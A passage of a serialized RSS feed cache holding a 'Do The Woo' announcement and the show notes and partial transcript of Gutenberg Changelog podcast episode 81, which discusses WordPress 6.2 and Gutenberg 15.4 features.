\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"Do The Woo Community: Woo DevChat Expands\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74708\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://dothewoo.io/woocommerce-devchat-expands/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:379:\"<p>By expanding our Woo DevChat it gives more of the WooCommerce and WordPress builder community a chance to share what they are building.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/woocommerce-devchat-expands/\">Woo DevChat Expands</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Apr 2023 08:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:139:\"Gutenberg Times: Gutenberg Changelog #81 – WordPress 6.2, Gutenberg 15.4 and 15.5, Phase 3 – Collaboration and a new  Interactivity API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://gutenbergtimes.com/?post_type=podcast&p=23825\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://gutenbergtimes.com/podcast/gutenberg-changelog-81-wordpress-6-2-interactivity-api/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68348:\"<p>Leonardus Nugraha and Birgit Pauli-Haack discuss WordPress&nbsp; 6.2, Gutenberg Releases 15.4 and 15.5, Phase 3 of the Gutenberg Project and a new Proposal on Interactivity API.</p>\n\n\n\n<p><a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-69-gutenberg-releases-wordpress-6-0-1-the-create-block-theme/#shownotes\">Show Notes</a> / <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-81-wordpress-6-2-interactivity-api/#transcript\">Transcript</a></p>\n\n\n\n<ul>\n<li>Music:&nbsp;<a href=\"https://soundcloud.com/xirclebox\">Homer Gaines</a></li>\n\n\n\n<li>Editor:&nbsp;<a href=\"https://www.linkedin.com/in/sandy-reed/\">Sandy Reed</a></li>\n\n\n\n<li>Logo:&nbsp;<a href=\"https://markuraine.com/\">Mark Uraine</a></li>\n\n\n\n<li>Production:&nbsp;<a href=\"https://icodeforapurpose.com\">Birgit Pauli-Haack</a></li>\n</ul>\n\n\n\n<p class=\"has-larger-font-size\"></p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Leonardus</strong> Nugraha</h2>\n\n\n\n<ul>\n<li><a href=\"https://leoandlens.com/\">Leo&#8217;s Photography site  leoandlens.com</a></li>\n\n\n\n<li><a href=\"https://www.instagram.com/leonnugraha/\">On Instagram @leonnugraha</a> </li>\n\n\n\n<li><a href=\"https://profiles.wordpress.org/leonnugraha/\">WordPress Profile @leonnugraha</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">20-Year WordPress Anniversary</h2>\n\n\n\n<ul>\n<li><a href=\"https://wp20.wordpress.net/20-years-of-wordpress-jazz/\">20 Years of WordPress Jazz</a> Playlist </li>\n\n\n\n<li><a href=\"https://wordpress.org/about/history/\">Jazz musicians and WordPress releases</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Community Contribution</h2>\n\n\n\n<p><a href=\"https://blockvisibilitywp.com/block-visibility-3-0-0-a-new-chapter-begins/\">Block Visibility 3.0.0: A New Chapter Begins</a></p>\n\n\n\n<h2 class=\"wp-block-heading\">What&#8217;s released</h2>\n\n\n\n<h3 class=\"wp-block-heading\">WordPress 6.2</h3>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/03/dolphy/\">WordPress 6.2 “Dolphy”&nbsp;</a></li>\n\n\n\n<li>&nbsp;<a href=\"https://make.wordpress.org/core/2023/03/10/6-2-live-product-demo-qa/\">6.2 Live Product Demo Q&amp;A</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/09/wordpress-6-2-field-guide/\">WordPress 6.2 Field Guide</a></li>\n\n\n\n<li><strong>Leonardus Nugraha</strong>&nbsp;for Hostinger:&nbsp;<a href=\"https://www.hostinger.com/blog/wordpress-6-2\">WordPress 6.2 Is Finally Here: A Detailed Overview</a></li>\n\n\n\n<li><strong>WPTavern</strong>: <a href=\"https://wptavern.com/wordpress-6-2-dolphy-introduces-a-revamped-site-editor-distraction-free-writing-mode-and-updated-block-inserter\">WordPress 6.2 “Dolphy” Introduces a Revamped Site Editor, Distraction-Free Writing Mode, and Updated Block Inserter</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\">Gutenberg 15.4 &amp; 15.5</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/22/whats-new-in-gutenberg-15-4-22-march/\">What’s new in Gutenberg 15.4 (22 March)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">What’s new in Gutenberg 15.5? (05 April)</a></li>\n\n\n\n<li><a href=\"https://wptavern.com/gutenberg-15-5-introduces-experimental-grid-layout-support\">Gutenberg 15.5 Introduces Experimental Grid Layout Support</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\">What&#8217;s in active development or discussed</h3>\n\n\n\n<h3 class=\"wp-block-heading\">Phase 3: Collaboration </h3>\n\n\n\n<ul>\n<li>Post by Matias Ventura <a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">Phase 3: Collaboration</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/design/2022/06/13/thinking-through-the-wordpress-admin-experience/\">Thinking Through the WordPress Admin Experience</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\">WP Briefing: Episode 52: Workflows and Phase Three Visioning with Special Guest Héctor Prieto</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\">Improve the Site Editor</h3>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/44461\">Re-Introduce Content Editing in the Site Editor</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/49404\">Optimize the content-centric edit experience</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\">Interactivity API</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a></li>\n\n\n\n<li><a href=\"https://wpmovies.dev/\">Demo Site</a> </li>\n\n\n\n<li>GitHub: <a href=\"https://github.com/wordpress/wp-movies-demo\">Interactivity API Demo &#8211; WP Movies</a></li>\n\n\n\n<li>4/17/23 &#8211; 8am UTC <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575913/\">Developer Hours: Introduction to the Interactivity API</a> </li>\n\n\n\n<li>4/17/23 &#8211; 17:00 UTC <a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/292575942/\">Developer Hours: Introduction to the Interactivity AP</a>I </li>\n\n\n\n<li><a href=\"https://wptavern.com/wordpress-contributors-propose-new-interactivity-api-for-frontend-blocks\">WordPress Contributors Propose New Interactivity API for Frontend Blocks</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">WordPress Design Team </h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/design/2023/03/27/design-share-mar-13-mar-24/\">Design Share: Mar 13–Mar 24</a></p>\n\n\n\n<p class=\"has-large-font-size\">Stay in Touch</p>\n\n\n\n<div class=\"wp-block-group is-layout-flow wp-block-group-is-layout-flow\"><div class=\"wp-block-group__inner-container\">\n<ul>\n<li>Did you like this episode? <a href=\"https://lovethepodcast.com/gutenbergchangelog\"><strong>Please write us a review </strong></a></li>\n\n\n\n<li>Ping us on Twitter or send DMs with questions. <a href=\"https://twitter.com/gutenbergtimes\">@gutenbergtimes </a>and <a href=\"https://twitter.com/bph\">@bph</a>.</li>\n\n\n\n<li><em>If you have questions or suggestions, or news you want us to include, send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a>. </em></li>\n\n\n\n<li><em>Please write us a review on iTunes! <a href=\"https://gutenbergtimes.com/itunes/\">(Click here to learn how)</a></em></li>\n</ul>\n</div></div>\n\n\n\n<p class=\"has-large-font-size\">Transcript</p>\n\n\n\n<p> </p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Hello, and welcome to our 81st episode of the Gutenberg Changelog Podcast. In today&#8217;s episode, we will talk about WordPress 6.2, Gutenberg releases 15.4 and 15.5, Phase 3 of the Gutenberg project, a new proposal on the interactivity API, and so much more. I&#8217;m your host, Birgit Pauli-Haack, curator at the Gutenberg Times and full-time core contributor to the WordPress Open Source Project, and I&#8217;m so thrilled to introduce to you Leonardus Nugraha as my special guest today. Leonardus is a contributor to the WordPress docs team and content specialist at Hostinger, and we personally met at WordCamp Asia and had some great meals together. So welcome to the show, Leonardus. Thank you so much for agreeing to come to the show and talk about Gutenberg with me. How are you?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. Ah, thank you. Very good. Thank you for having me in the show. I&#8217;m good. And yeah, it&#8217;s nice to be here with your Gutenberg Changelog podcast. And it&#8217;s good to meet you again here after our in-person meetings. Yeah. It&#8217;s been two months we met in WordCamp Asia, right?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; So it&#8217;s nice to have a chat with you again, talk about Gutenberg, talk about WordPress. Yeah. And yeah, thanks for introducing me as well. Yeah, you can call me Leo for short.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh, hi, Leo.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; And yeah, content. Yeah, Leo. And as a content specialist, I curate and organize WordPress content in hosting our tutorials and blogs. And with the documentation team, I also work on mainly end user documentation articles. So yeah, my work is all about WordPress articles. Yeah, I&#8217;m loving it. I&#8217;m loving to do things and work about WordPress.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, wonderful, wonderful. Yeah. Tell us a little bit about you. Where you live and what you do for fun. Do you have family?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, I live in Indonesia in a city named Bogor, and it&#8217;s known as Rain City.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh, no.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, it rains a lot here, but it&#8217;s nice, it&#8217;s cool, it&#8217;s chill. I think personally, I love the weather. I&#8217;m not sure everyone else. Yeah, when I&#8217;m not working with content or WordPress in general, just for fun, I usually play music. I play guitar, electric guitar mainly, and listening to music on my free time, or just have fun with my dogs. I have two big dogs and I consider them as my family, to be honest.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, yeah, of course, of course. Yeah. That&#8217;s awesome. So many of our listeners are also dog people, and I&#8217;m sure they would like to know what kind of dogs you have, and do you share photos of them somewhere online?</p>\n\n\n\n<p><em>Leonardus Nugraha:</em>&nbsp; Yeah, one of them is a mixed breed. It&#8217;s a quite big dog. It&#8217;s about 20 kilograms. And the other one is a big golden retriever. So I have big dogs with me. I think with a combined weight, they&#8217;re bigger than me, to be honest. I love taking photos. Actually, as you may know, I&#8217;m a photography team in WordCamp, and I do have a online portfolio called <a href=\"https://leoandlens.com/\">LeoandLens.com</a>, and I have some of photos of my docs there as well. And also WordCamp Asia photos, obviously. So, and I do have Instagram as well, and I upload or post docs, photos or just random photos there if you want to see it.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And we&#8217;ll share the links in the show notes to catch up with you online or stalk you online.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Sure.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: So speaking of music, as part of the 20-year celebration coming up for WordPress, Julia Golomb published a playlist on Spotify of 20 Years of WordPress Jazz. From Miles Davis to Mikhail &#8220;Misha&#8221; Alperin. And it includes one song for each of the 45 jazz artists selected to represent the releases in the last 20 years. So this is really cool. And sometimes I just listen to it when I&#8217;m curating content, reading, copy-pasting and doing that. So yeah, what kind of music do you play?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; To be honest, it&#8217;s not jazz, so I hope I don&#8217;t disappoint the WordPress community for that.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: No.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Mainly I listen to &#8217;80s, &#8217;90s rock and heavy metal, probably some blues and rock and roll. But as a part of WordPress committee and celebrating 20 years of WordPress, probably I should start listening to jazz.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, we have all our preferences. And some of the jazz like Django Reinhardt or something like that, it&#8217;s really great guitars showing off. So yeah, I&#8217;m not always a fan of jazz. It depends on my mood when I listen to jazz. Yeah. So yeah. So you want, let&#8217;s get further into the show.&nbsp;</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Community Contributions</strong></h3>\n\n\n\n<p>We have a great show coming to you, dear listeners. And for the &#8220;Community Contributions&#8221; section we have in his post, Block Visibility 3.0. A new chapter begins. Nick Diego announced that he&#8217;s making all Pro features available for free on his plugin, Block Visibility. And there are a couple of exceptions for which he needs just more time to integrate them into the free versions, but he&#8217;s aiming to pack it all in one version, make it available at no cost. And with a plugin, if you don&#8217;t know it, Block Visibility plugin, you can control, show or hide blocks depending on, for instance, a date or a user role or a location or a referral source, and it extends the core block editor with additional settings on the right. So this is a really good plugin, and it has a few fans.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, it&#8217;s definitely great plugins, especially if you are collaborating with big team on your WordPress site. Of course, we have user rules and user permissions, but with this plugin, you can extend the functionality and the controls with this plugin towards the blocks. And yeah, this is definitely good news to have this plugin for free for the community at no cost. And I read the blog post, and I really appreciate how Nick mentioned the importance of giving back to the community. It is all WordPress is about, right, to give to the community. And I believe with this decision, there will be more and more aspiring WordPress website owners to benefit from next creation. So yeah, everybody&#8217;s win.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, right. Everybody&#8217;s win. Yes, indeed. And since the plugin came out two years ago, I always had the hope that the core developers would consider bringing it to the core functionality of the Block Editor. Maybe that&#8217;s still in the stars, but the future is bright, so we never know what comes. But by the way, Nick Diego as a news item, joined Automattic as a full-time sponsored contributor, and I&#8217;m thrilled that he became a teammate. He has been a special guest on the show before, and I certainly see him joining again in the future. So watch out.&nbsp;</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>What’s Released &#8211; WordPress 6.2</strong></h3>\n\n\n\n<p>Now we come to the last two weeks where a lot of releases happened, or actually four weeks since the last episode, and we&#8217;ll start with the big one, that&#8217;s WordPress 6.2. You heard us talking here on the show before. So WordPress 6.2 had over 600 contributors, and it&#8217;s the first major release in 2023.</p>\n\n\n\n<p>The contributors come from at least 50 countries with 900 enhancements, 10 full Gutenberg releases or features from those releases, and then a slew of performance improvements. You might not be surprised to learn that Dolphy reached the impressive milestone of 2 million downloads in under two hours. So after the release and in the first week, it reached over 18 million downloads. So that&#8217;s pretty impressive. And also shows maybe there are some hosting companies that actually automatically update to new versions or at least other, there is a mechanism there that you can automatically update to the new version. And it seems to be working. So are you doing that at Hostinger, that there are automatic updates to the new version for WordPress sites?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, we do have a feature for the users to enable auto updates, both for the minor versions and major versions. Usually we enable it for the minor versions, like 6.2.1 because usually there&#8217;s not many new features or bug fixes. Users can enable for the major updates like 6.2, but usually it&#8217;s better to have that tested on staging site as well, which Hostinger also have, to make sure the site&#8217;s working properly, there&#8217;s no compatibility issues with their plugins or with their content. So yeah, we do have that feature, but it&#8217;s safer for the users to test it first for major updates like this, especially with more than 900 enhancements and new features to the workplace.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: No, totally get it. Yeah, when I was working with the agency and our client sites, we would wait at least two weeks, if not four, to see what&#8217;s happening with a new release and if there&#8217;s a patch release coming out. So yeah, test it please, dear listeners. So if you haven&#8217;t yet, the release candidate actually came out March 8th or 7th, so the last four weeks, it could have been that you could already test some of that quite extensively. So.</p>\n\n\n\n<p>Now Rich Tabor and I discussed the site editor updates in WordPress 6.2 in the last episode, and summarize their significant updates to revamp the site editing interface to get new styling features for various blocks that were typography, styling, dimensions, and also color stylings. And then there&#8217;s a Distraction Free Writing mode and a new integration with Openverse, formerly Creative Commons Search, that enables a quick access to listen to that; 700 million free and openly licensed images and audio. So Leo, you published a blog post taking a detailed view on WordPress 6.2, and you are certainly now an expert on all the features. Have you decided what are your most exciting features for you?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; It&#8217;s hard to pick one most exciting features, because I think this release is probably, in my opinion, brings more and more enhancement compared to 6.1, 6.2, from the perspective of end users. But obviously, for me, it&#8217;s the revamped Site Editor that is really exciting to have. Finally, we have a new, fresh, clean view of the interface. And users can just switch between templates, have a preview before actually start editing. And it&#8217;s also easy to pick a template. You just click on the canvas and start editing. You don&#8217;t have to actually click the button as well. So that&#8217;s a nice little touch there. And also the Global Styles panel with the zoom in, zoom out effect. Now users can just see the whole template and how the style federations affect the site. And the style works. It&#8217;s interesting to have it, to have all the blocks previewed with the tabs. And it also works with Commerce as well.</p>\n\n\n\n<p>If you have WooCommerce installed, you can have the new tabs for the WooCommerce blocks and the Global Style Book as well. And Openverse integration, very exciting to hear, especially when the Openverse became the part of WordPress project. It&#8217;s already exciting, but still, back then, you still have to download the content to your local computer and then re-upload to WordPress, which is a lengthy process, to be honest. And with the new integration, everything&#8217;s now works seamlessly.</p>\n\n\n\n<p>And I really do appreciate how to developers improve it during, was it on that? I think during the beta phase when they decided to upload the image to Media Library automatically instead of just linking to the content. So that&#8217;s nice. Lastly, for me, the biggest one, everything is big, but this one, Distraction Free mode is personally my favorite. Because I don&#8217;t remember how many times I got distracted or obscured by the block toolbar. When you start a new paragraph below the headings or maybe you have some few blocks near on top of each other, sometimes the block tool can obscure the content. And it&#8217;s annoying when you have a paragraph below a heading and you want to move back to edit the heading, you have to get rid of the toolbar first. So you have to click elsewhere, and it&#8217;s complicated.</p>\n\n\n\n<p>But now with the Distraction Free, no toolbar, I can just focus on my content, writing. And yeah, that&#8217;s the main highlight for me personally. There&#8217;s other things like copy-paste styles, which speeds up the customization process. When you pick a block that you like and you decide, &#8220;Ah, I want to use this style,&#8221; you can just copy to another one. Or you can just post it globally to apply it to all blocks on your side.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. The changing of things, you can get very granular and you can escalate some of the styles to the global styles. And I think it&#8217;s quite intuitive to do that. But the Distraction Free mode is definitely one of the, I&#8217;m so glad that came to core. There was a plugin available called Iceberg by Rich Tabor and Jeffrey Caradang for a long time, and they actually created a Distraction Free mode. And I really loved it when I was doing some journaling, where you don&#8217;t need any pictures or something like that, you&#8217;re just channel your inner self or inner mom or inner dad and just write. And that makes it much better writing experience. And I think quite a few bloggers were put off by the block toolbar that gets in the way every time. And there was this, or there is still this feature that you can patch or stick the toolbar to the top, but you still get all the distractions from other things.</p>\n\n\n\n<p>You move the mouse and something happens, and then it goes. And it&#8217;s just sometimes a little noisy. So the Distraction Free mode is definitely beneficial. I also like to surface some great material around the Site Editor for educators. So with WordCamps and conferences on the horizon, meetups are getting re-energized to meet in place, face-to-face meetings and localities, presentations need to be prepared. And Anne McCarthy has a post on her personal blog that&#8217;s called, &#8220;So you want to talk about Site Editor, Part Four.&#8221; And gives you all the resources that would need to speed up your preparations for any presentations. And of course, we&#8217;ll share that in the show notes.&nbsp;</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Gutenberg 15.4</strong></h3>\n\n\n\n<p>So that brings us to the next Gutenberg plugin release. Gutenberg 15.4 was released. Justin Tadlock and Ryan Welcher handled it and it contained 186 PRs with 57 contributors. Six of them were first-timers, so congrats all around.</p>\n\n\n\n<p>And it was a smaller release, because it also had a few bug fixes for the 6.2 that were doing the beta and release backported, as the techies say, to the release version of 6.2.&nbsp;</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Enhancements</strong></h3>\n\n\n\n<p>So there are a few enhancements I wanted to talk about. So one is go direct to edit from a &#8220;Manage all template&#8221; list. That&#8217;s something you just mentioned, Leo, that you see the template in the preview and the Template Editor or in the Site Editor, you see the template. And then you click on it, and you&#8217;re right there in the edit mode for the template. And that came with 15.4, you mentioned it. Now you also see in the panel on the left-hand side, the PR says, &#8220;The Site Editor&#8217;s dark side.&#8221; Which, it&#8217;s not philosophical, it&#8217;s the black sidebar on the left-hand side. And now there are descriptions for each of the templates. So you know a little bit more when a theme comes in or you enable a new theme, what the templates are supposed to do. And theme editors are able to add templates as well.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, I think the description, I didn&#8217;t really notice at first when the full Site Editor came to WordPress, but I think having description for its templates like 404 or &#8220;Single post&#8221; or &#8220;Archive,&#8221; it helps many, many first-time users, WordPressers who are still learning. Having this description will be great for them, definitely.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And when you switch theme or have Template Parts or create new ones, you also get a signal from who created them, and from which theme do they come over. That is a signal for the future, where there is thinking about how to make Template Parts and templates less reliant on particular theme. So when you switch the theme and you created a new template as a site owner, you want the template to come over to the new theme as well and not just go away with the old theme. So there&#8217;s some big thinking to be done, because that can get complex so fast.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. But that will really relevant with the next phase, which is collaboration, to have Template Parts and templates stick to the WordPress instead of the themes. And you can know which user create the template, or whether it&#8217;s made from the themes. So yeah, hopefully it&#8217;s a great path to the future.</p>\n\n\n\n<p>So yeah, we can move on to the next one. It&#8217;s a navigation sidebar. So we have the new logic, which navigation to be shown on the dark side, as you mentioned. I think the first iteration, it shows the first navigation that is created on the team or templates. And now it shows the latest one that is published, which in my opinion, it&#8217;s really logical. It&#8217;s a good step because most likely users will use the latest one and the latest navigation block that they made.</p>\n\n\n\n<p>But yeah, this is definitely still something, in my opinion, can be improved further, especially with the James Koster&#8217;s idea about having a label or hint to identify which menu actually been shown on the dark side. As for now, if you change the menu on the block tools, the navigation block tools, which on the right side, sometimes it doesn&#8217;t really change the one on the dark side. So you can switch to the older menu on the block tools, but then the dark side stick. And yeah, sometimes it can be confusing for new users. So hopefully, we are moving to the right direction here, in my opinion. But definitely, James Koster&#8217;s idea is definitely something worth to think about and to have labeling or hint, especially for new users again, who are still learning.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And I think there was a reason why the navigation part was actually pulled from 6.2. It&#8217;s now coming back with a Gutenberg plugin, but it was pulled from the 6.2 because it was still not performing to the quality that I want. And it wasn&#8217;t really all that intuitive, because the sidebar, when you actually edit a navigation block on the sidebar, it behaves differently than what was on the left side. So that was good. I think it was a good decision, even late in the cycle. That&#8217;s what the next part is, the height navigation screen, that was in 15.4 and was backported to 6.2.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, I remember testing it on the beta and the RC. The experience is still not perfect yet, I remember, because why is it different between the block tools and the sidebar? And then I heard the news from AN and that it&#8217;s backported again put from 6.2. So yeah, for me, it&#8217;s perfectly make sense. And hopefully they can deliver it, on the next layer is 6.3. They can get everything perfect with a perfect experience for users. And yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Good. Yeah, the Cover Block now also has constrained flow layout, which means that it can be used in different context, and then applied the block inner wrapper by default. And it means that the layered support will work in the Cover Block the same way as it does for the group block, but without the facts variations. So you cannot change how the Cover Block children behave in the full end wide alignment of the Cover Block context. I don&#8217;t know if that makes sense.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, I think it makes sense for the Cover Block. Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, the FontSizePicker, that&#8217;s just a small note here that the FontSizePicker now allows custom units for theme developers that you can offer to your users. It before was only using pixels, and what was the other one?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; RVM?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh yeah, RVM. Yeah, or EMs. And now you can use all of them that are possible. Like VW and all that. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. And on the next one we have new block support. So have a text column, or column support on the typographic settings. So I think on this PR, the example, the great example is the paragraph block. So usually if you have a paragraph block, it&#8217;s just like a block of text. But now with this text column support, you can add columns, the number of columns. So you can split the paragraph into separate columns without actually using a column blocks, which is a great option if you want to customize your content, maybe make it like a newspaper style. You don&#8217;t have to use the column block separately. You can just split your paragraph into columns.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Yeah. And it adjusts if you add more text to it and adjust the columns to it. And it&#8217;s great that there&#8217;s now typography support available, so you can actually change fonts or make them larger, smaller, or change the line height. What might be needed when you are in smaller columns, you can reduce the line height on your texts. So those controls are now available in the user interface. But one caveat on this, the text columns is only available when the theme actually enables it. It&#8217;s not coming out of the box yet, so you need to adjust the theme a little bit to actually be able to use that.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, I think it used to, you have to add a little bit of code to make it enabled in the theme that JSON file, right?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Correct. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; For now.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, for now. And I need to figure out maybe next release, there will be a way to enable it as a site builder with not access to code to also make use of it. And the Cover Block now got Text Scholar Block support. I was thinking, &#8220;Okay, that didn&#8217;t happen before.&#8221; But obviously it didn&#8217;t, because it&#8217;s now in the plugin. Yes, those design tools are rolled out to the core blocks one at a time to enable them and then test them, to make sure that they&#8217;re work in every context nicely.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; And the next one, adding compound class to layout wrapper or global style spacing. Maybe you can cover this.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: So the problem was that the Cover Block didn&#8217;t work out of the box. The covers mark up the structure and they needed to change the classes to make them also available to the float. And so the Cover Block was a little bit revamped to specify target wrapper for the class, and for the layout of the object. So it was hard to target things that are inside the inner blocks. So that was a revamp that was necessary. So those who style themes can actually access those easily and style them. There was a specificity problem, I think. So for theme developers, they will make sense of it. So the spacing wasn&#8217;t clear for the block children. It was random inside the Cover Block. So they changed that and fixed it. It was a long way around it, explaining it, but sorry. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, so developer focus one. Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, seem develop the styles. Yeah, CSS. And sometimes I have a hard time with it.&nbsp;</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Bug Fixes</strong></h3>\n\n\n\n<p>So now we come to the bug fixes, those were all the enhances of the 15.4 Gutenberg plugin release. We have, I think only two bug fixes that we want to point out, because sometimes you want to know when a bug is fixed. And the first one is that to ensure that the aspect ratio selected is also applied to the post feature image block, and in the Post Template block. So it shows up when you have a summary page, and you have the featured image with the blocks in a grid, that the aspect ratio is actually applied to the post featured block. That&#8217;s really important. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; I remember I was having problem with featured image ratio quite a long time ago, but I didn&#8217;t realize that it&#8217;s actually a bug. So yeah, I&#8217;m glad that it&#8217;s 